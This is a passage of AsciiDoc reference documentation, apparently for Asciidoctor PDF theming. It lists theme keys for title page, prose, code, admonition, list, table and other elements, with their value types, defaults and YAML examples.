  title:
    font-style: bold

|text-transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|title-page:
  title:
    text-transform: uppercase

|line-height
|<<values,Number>> +
(default: $heading-line-height)
|title-page:
  title:
    line-height: 0.9

|top
|Percentage^[4]^ +
(default: 40%)
|title-page:
  title:
    top: 55%

|margin-top
|<<measurement-units,Measurement>> +
(default: 0)
|title-page:
  title:
    margin-top: 13.125

|margin-bottom
|<<measurement-units,Measurement>> +
(default: 0)
|title-page:
  title:
    margin-bottom: 5

3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title-page-subtitle>>

|font-color
|<<colors,Color>> +
(default: _inherit_)
|title-page:
  subtitle:
    font-color: #181818

|font-family
|<<fonts,Font family name>> +
(default: _inherit_)
|title-page:
  subtitle:
    font-family: Noto Serif

|font-size
|<<values,Number>> +
(default: 14)
|title-page:
  subtitle:
    font-size: $heading-h3-font-size

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|title-page:
subtitle:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n subtitle:\n line-height: 1\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title-page-authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n authors:\n delimiter: '; '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n authors:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title-page:\n authors:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n authors:\n margin-bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title-page-revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n revision:\n delimiter: ': '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-size: $base-font-size-small\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n revision:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-bottom: 5\n|===\n\n. To disable the background color for the title page, set the value to white (i.e., FFFFFF).\nThe color keyword `transparent` is not recognized in this context.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`) and centered (i.e., `position=center`).\nThe size of the background image can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nThe position of the background image can be controlled using the `position` attribute.\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. 
Percentage unit can be % (relative to content height) or vh (relative to page height).

[#keys-prose]
=== Prose

The keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).
Typically, all the margin is placed on the bottom.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>

|margin-top
|<<measurement-units,Measurement>> +
(default: 0)
|prose:
  margin-top: 0

|margin-bottom
|<<measurement-units,Measurement>> +
(default: 12)
|prose:
  margin-bottom: $vertical-spacing

|margin-inner^[1]^
|<<measurement-units,Measurement>> +
(default: $prose-margin-bottom)
|prose:
  margin-inner: 0

|text-indent
|<<measurement-units,Measurement>> +
(default: _not set_)
|prose:
  text-indent: 18
|===

. Controls the margin between adjacent paragraphs.
Useful when using indented paragraphs.
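For example, a sketch of a theme for indented-paragraph typesetting might pair a first-line indent with no spacing between adjacent paragraphs (the values are just illustrations):

[source,yaml]
----
prose:
  text-indent: 18
  margin-inner: 0
----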
[#keys-block]
=== Block

The keys in this category control the spacing around block elements when a more specific setting is not designated.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>

//|padding
//|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>
//|block:
//  padding: [12, 15, 12, 15]

|margin-top
|<<measurement-units,Measurement>> +
(default: 0)
|block:
  margin-top: 6

|margin-bottom
|<<measurement-units,Measurement>> +
(default: 12)
|block:
  margin-bottom: 6
|===

Block styles are applied to the following block types:

[cols="3*a",grid=none,frame=none]
|===
|
* admonition
* example
* quote
|
* verse
* sidebar
* image
|
* listing
* literal
* table
|===

[#keys-caption]
=== Caption

The keys in this category control the arrangement and style of block captions.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>

|align
|<<text-alignments,Text alignment>> +
(default: left)
|caption:
  align: left

|font-color
|<<colors,Color>> +
(default: _inherit_)
|caption:
  font-color: #333333

|font-family
|<<fonts,Font family name>> +
(default: _inherit_)
|caption:
  font-family: M+ 1mn

|font-size
|<<values,Number>> +
(default: _inherit_)
|caption:
  font-size: 11

|font-style
|<<font-styles,Font style>> +
(default: italic)
|caption:
  font-style: italic

|text-transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|caption:
  text-transform: uppercase

|margin-inside
|<<measurement-units,Measurement>> +
(default: 4)
|caption:
  margin-inside: 3

|margin-outside
|<<measurement-units,Measurement>> +
(default: 0)
|caption:
  margin-outside: 0
|===

[#keys-code]
=== Code

The keys in this category are used to control the style of literal, listing and source blocks.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>

|background-color
|<<colors,Color>> +
(default: _not set_)
|code:
  background-color: #f5f5f5

|border-color
|<<colors,Color>> +
(default: #eeeeee)
|code:
  border-color: #cccccc

|border-radius
|<<values,Number>> +
(default: _not set_)
|code:
  border-radius: 4

|border-width
|<<values,Number>> +
(default: 0.5)
|code:
  border-width: 0.75

|font-color
|<<colors,Color>> +
(default: _inherit_)
|code:
  font-color: #333333

|font-family
|<<fonts,Font family name>> +
(default: Courier)
|code:
  font-family: M+ 1mn

|font-size
|<<values,Number>> +
(default: 10.8)
|code:
  font-size: 11

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|code:
  font-style: italic

|line-height
|<<values,Number>> +
(default: 1.2)
|code:
  line-height: 1.25

|line-gap^[1]^
|<<values,Number>> +
(default: 0)
|code:
  line-gap: 3.8

|padding
|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +
(default: 9)
|code:
  padding: 11

3+|[#key-prefix-code-linenum]*Key Prefix:* <<key-prefix-code-linenum,code-linenum>>^[2]^

|font-color
|<<colors,Color>> +
(default: #999999)
|code:
  linenum-font-color: #ccc
|===
. The line-gap property is used to tune the height of the background color applied to a span of block text highlighted using Rouge.
. The code-linenum category only applies when using Pygments as the source highlighter.
Otherwise, the style is controlled by the source highlighter theme.

[#keys-callout-numbers]
=== Callout Numbers

The keys in this category are used to control the style of callout numbers (i.e., conums) inside verbatim blocks and in callout lists (colists).

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>

|font-color
|<<colors,Color>> +
(default: _inherit_)
|conum:
  font-color: #b12146

|font-family^[1,2]^
|<<fonts,Font family name>> +
(default: _inherit_)
|conum:
  font-family: M+ 1mn

|font-size^[2]^
|<<values,Number>> +
(default: _inherit_)
|conum:
  font-size: $base-font-size

|font-style^[2]^
|<<font-styles,Font style>> +
(default: _inherit_)
|conum:
  font-style: normal

|line-height^[2]^
|<<values,Number>> +
(default: 1.15)
|conum:
  line-height: 4 / 3

|glyphs^[3]^
|circled {vbar} filled {vbar} Unicode String ranges +
(default: circled)
|conum:
  glyphs: \u0031-\u0039
|===

. Currently, the font must contain the circle numbers starting at glyph U+2460.
. font-family, font-size, font-style, and line-height are only used for markers in a colist.
These properties are inherited for conums inside a verbatim block.
. The font must provide the required glyphs.
The glyphs can be specified as a comma-separated list of ranges, where the range values are Unicode numbers (e.g., \u2460).
[#keys-button]
=== Button

The keys in this category apply to a button reference (generated from the inline button macro).

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-button]*Key Prefix:* <<key-prefix-button,button>>

|background-color
|<<colors,Color>> +
(default: _not set_)
|button:
  background-color: #0000ff

|border-color^[1]^
|<<colors,Color>> +
(default: _not set_)
|button:
  border-color: #cccccc

|border-offset^[2]^
|<<values,Number>> +
(default: 0)
|button:
  border-offset: 1.5

|border-radius
|<<values,Number>> +
(default: 0)
|button:
  border-radius: 2

|border-width
|<<values,Number>> +
(default: $base-border-width)
|button:
  border-width: 0.5

|content^[3]^
|<<quoted-string,Quoted string>> +
(default: "%s")
|button:
  content: "[\u2009%s\u2009]"

|font-color
|<<colors,Color>> +
(default: _inherit_)
|button:
  font-color: #ffffff

|font-family
|<<fonts,Font family name>> +
(default: Courier)
|button:
  font-family: M+ 1mn

|font-size
|<<values,Number>> +
(default: _inherit_)
|button:
  font-size: 12

|font-style
|<<font-styles,Font style>> +
(default: bold)
|button:
  font-style: normal
|===
. The border is only used if a border color is specified and the border width is not explicitly set to 0.
. The border offset is the amount that the background and border swell around the text.
It does not affect the distance between the formatted phrase and the phrases that surround it.
. The character sequence `%s` in the content key gets replaced with the button label.

[#keys-key]
=== Key

The keys in this category apply to a key reference (generated from the inline kbd macro).

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-key]*Key Prefix:* <<key-prefix-key,key>>

|background-color
|<<colors,Color>> +
(default: _not set_)
|key:
  background-color: #fafafa

|border-color^[1]^
|<<colors,Color>> +
(default: _not set_)
|key:
  border-color: #cccccc

|border-offset^[2]^
|<<values,Number>> +
(default: 0)
|key:
  border-offset: 1.5

|border-radius
|<<values,Number>> +
(default: 0)
|key:
  border-radius: 2

|border-width
|<<values,Number>> +
(default: $base-border-width)
|key:
  border-width: 0.375

|separator^[3]^
|<<quoted-string,Quoted string>> +
(default: "+")
|key:
  separator: "\u2009+\u2009"

|font-color
|<<colors,Color>> +
(default: _inherit_)
|key:
  font-color: #000

|font-family
|<<fonts,Font family name>> +
(default: Courier)
|key:
  font-family: $base-font-family

|font-size
|<<values,Number>> +
(default: _inherit_)
|key:
  font-size: 10.5

|font-style
|<<font-styles,Font style>> +
(default: italic)
|key:
  font-style: normal
|===
. The border is only used if a border color is specified and the border width is not explicitly set to 0.
. The border offset is the amount that the background and border swell around the text.
It does not affect the distance between the formatted phrase and the phrases that surround it.
. 
The separator is only used for multi-key sequences.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret-content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret-content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border-width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border-width: 5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border-color: #eeeeee\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote-cite>>\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-family: Noto Serif\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text-transform: uppercase\n|===\n\n. 
Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border-color: #ffffff\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text-transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background-color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background-color: #fffef7\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border-color: #eeeeee\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition 
type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column-rule-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column-rule-color: #aa0000\n\n|column-rule-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column-rule-style: double\n\n|column-rule-width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column-rule-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font-size: $base-font-size-large\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text-transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition-label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min-width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min-width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition-padding)\n|admonition:\n padding: [0, 12, 0, 12]\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical-align: top\n\n3+|*Key Prefix:* admonition-label, admonition-label-<name>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text-transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition-icon-<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fas-fire\n\n|stroke-color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke-color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition-label-padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip-name: far-lightbulb` is not valid syntax).\n. 
Required.
See the `.yml` files in the https://github.com/jessedoyle/prawn-icon/tree/master/data/fonts[prawn-icon repository] for a list of valid icon names.
The prefix (e.g., `fas-`) determines which font set to use.

[#keys-image]
=== Image

The keys in this category control the arrangement of block images.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>

|align
|<<image-alignments,Image alignment>> +
(default: left)
|image:
  align: left

|width^[1]^
|<<measurement-units,Measurement>> +
(default: _not set_)
|image:
  width: 100%
|===

. Only applies to block images.
If specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.

[#keys-svg]
=== SVG

The keys in this category control the SVG integration.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-svg]*Key Prefix:* <<key-prefix-svg,svg>>

|fallback_font_family^[1]^
|<<fonts,Font family name>> +
(default: $base-font-family)
|svg:
  fallback_font_family: Times-Roman
|===
. The fallback font family is only used when the font family in the SVG does not map to a known font name from the font catalog.

[#keys-lead]
=== Lead

The keys in this category control the styling of lead paragraphs.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>

|font-color
|<<colors,Color>> +
(default: _inherit_)
|lead:
  font-color: #262626

|font-family
|<<fonts,Font family name>> +
(default: _inherit_)
|lead:
  font-family: M+ 1p

|font-size
|<<values,Number>> +
(default: 13.5)
|lead:
  font-size: 13

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|lead:
  font-style: bold

|text-transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|lead:
  text-transform: uppercase

|line-height
|<<values,Number>> +
(default: 1.4)
|lead:
  line-height: 1.4
|===

[#keys-abstract]
=== Abstract

The keys in this category control the arrangement and style of the abstract.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>

|font-color
|<<colors,Color>> +
(default: $base-font-color)
|abstract:
  font-color: #5c6266

|font-size
|<<values,Number>> +
(default: 13.5)
|abstract:
  font-size: 13

|font-style
|<<font-styles,Font style>> +
(default: $base-font-style)
|abstract:
  font-style: italic

|text-transform
|<<text-transforms,Text transform>> +
(default: $base-text-transform)
|abstract:
  text-transform: uppercase

|line-height
|<<values,Number>> +
(default: 1.4)
|abstract:
  line-height: 1.4

|padding
|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +
(default: 0)
|abstract:
  padding: [0, 12, 0, 12]

3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract-title>>

|align
|<<text-alignments,Text alignment>> +
(default: center)
|abstract:
  title:
    align: center

|font-color
|<<colors,Color>> +
(default: $base-font-color)
|abstract:
  title:
    font-color: #333333

|font-family
|<<fonts,Font family name>> +
(default: $base-font-family)
|abstract:
  title:
    font-family: Noto Serif

|font-size
|<<values,Number>> +
(default: $base-font-size)
|abstract:
  title:
    font-size: 13

|font-style
|<<font-styles,Font style>> +
(default: bold)
|abstract:
  title:
    font-style: bold

|text-transform
|<<text-transforms,Text transform>> +
(default: $base-text-transform)
|abstract:
  title:
    text-transform: uppercase
|===

[#keys-thematic-break]
=== Thematic Break

The keys in this category control the style of thematic breaks (aka horizontal rules).

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-thematic-break]*Key Prefix:* <<key-prefix-thematic-break,thematic-break>>

|border-color
|<<colors,Color>> +
(default: #eeeeee)
|thematic-break:
  border-color: #eeeeee

|border-style
|solid {vbar} double {vbar} dashed {vbar} dotted +
(default: solid)
|thematic-break:
  border-style: dashed

|border-width
|<<measurement-units,Measurement>> +
(default: 0.5)
|thematic-break:
  border-width: 0.5

|margin-top
|<<measurement-units,Measurement>> +
(default: 0)
|thematic-break:
  margin-top: 6

|margin-bottom
|<<measurement-units,Measurement>> +
(default: $vertical-spacing)
|thematic-break:
  margin-bottom: 18
|===

[#keys-description-list]
=== Description List

The keys in this category control the arrangement and style of description list items (terms and descriptions).

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description-list>>

|term-font-style
|<<font-styles,Font style>> +
(default: bold)
|description-list:
  term-font-style: italic

|term-spacing
|<<measurement-units,Measurement>> +
(default: 4)
|description-list:
  term-spacing: 5

|description-indent
|<<values,Number>> +
(default: 30)
|description-list:
  description-indent: 15
|===

[#keys-outline-list]
=== Outline List

The keys in this category control the arrangement and style of outline list items.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline-list>>

|indent
|<<measurement-units,Measurement>> +
(default: 30)
|outline-list:
  indent: 40

|item-spacing
|<<measurement-units,Measurement>> +
(default: 6)
|outline-list:
  item-spacing: 4

|marker-font-color^[1]^
|<<colors,Color>> +
(default: _inherit_)
|outline-list:
  marker-font-color: #3c763d

|text-align^[2]^
|<<text-alignments,Text alignment>> +
(default: $base-align)
|outline-list:
  text-align: left
|===

. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.
. 
Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist-marker>>\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: $outline-list-marker-font-color)\n|ulist:\n marker:\n font-color: #cccccc\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|ulist:\n marker:\n line-height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist-marker-<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-family: fas\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-color: #ff0000\n\n|line-height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line-height: 2\n|===\n\n. <type> is one of disc, square, circle, checked, unchecked\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background-color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background-color: #ffffff\n\n|border-color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border-style: solid\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border-width: 0.5\n\n|caption-side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption-side: bottom\n\n|caption-max-width\n|fit-content {vbar} none +\n(default: fit-content)\n|table:\n caption-max-width: none\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font-family: Helvetica\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font-size: 9.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font-style: italic\n\n|grid-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n grid-color: #eeeeee\n\n|grid-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid-style: dashed\n\n|grid-width\n|<<values,Number>> +\n(default: $table-border-width)\n|table:\n grid-width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table-head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n head:\n background-color: #f0f0f0\n\n|border-bottom-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n head:\n border-bottom-color: #dddddd\n\n|border-bottom-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n head:\n border-bottom-style: 
